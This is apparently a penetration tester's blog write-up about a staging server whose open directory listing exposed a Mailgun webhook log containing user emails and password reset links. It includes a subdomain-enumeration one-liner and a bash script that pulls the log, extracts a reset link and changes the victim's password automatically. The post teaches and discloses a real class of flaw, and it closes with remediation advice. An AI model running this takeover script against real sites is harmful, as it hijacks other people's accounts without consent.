Directory Listing to Account Takeover

Directory listing is one of the most common misconfigurations which can be exploited trivially. However, the impact depends on the criticality of the files present inside the directory.

Recently, during one of my pentests, I came across an interesting open directory which I was able to leverage. On enumerating, I discovered a subdomain which was the staging server and was accessible over the internet.

[nishaanthguna:~/essentials]$ curl --silent https://crt.sh/\?q\=%.domain.com | sed 's/<\/\?[^>]\+>//g' | grep -i domain.com | tail -n +9 | cut -d ">" -f2 | cut -d "<" -f1
www.domain.com
blog.domain.com
stag.domain.com

On running a port scan, it was found that the port 8080 was open and had a directory listing. There wasn’t anything sensitive until I found this.

mailgun

From Mailgun’s API documentation, it looks like the admininstator can track the bounces, clicks, spam compliants, if the mail got delivered or if the user unsubscribed along with the URLs. So, what is the problem here?

Not only the logs leaked personal and developer e-mail addresses, it also did have the reset password links. Something like this,

reset

An attack scenario would be something similar to,

  1. An attacker uses the e-mail address obtained from the logs and resets the password using ‘Forgot Password’ functionality.
  2. The victim clicks on the link sent to their e-mail address.
  3. The Attacker gets hold of the password reset token because of the directory listing and resets the password.

I wrote a quick script to curl the mailgun-webhook.log file, search for reset links and automatically reset the password.

#!/bin/bash

curl https://domain.com/mailgun-webhook.log | tee direct.txt
if grep -Fxq "reset" direct.txt
then
 echo "[+]Found a Password Reset link"
 link=$(cat direct.txt | grep -i reset | cut -d "," -f6  |
 cut -d "\\" -f1 | head -n 1)
 curl '$link'-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6)'
 --data 'password=testpassword%21%21&confirmation=testpassword%21%21' --compressed
 echo "[+]Password changed to testpassword!!"
else
 echo "[-]Reset link not found"
fi

It is always recommended to disable directory listing and never store sensitive information like credentials, password reset links, API keys in cleartext.

Update - Some people are confusing this vulnerability with the recent Reddit Email Vulnerability which was used to steal Bitcoin Cash. Both of the vulnerabilities are completely unrelated except for the fact that accounts were compromised in a similar fashion.

comments powered by Disqus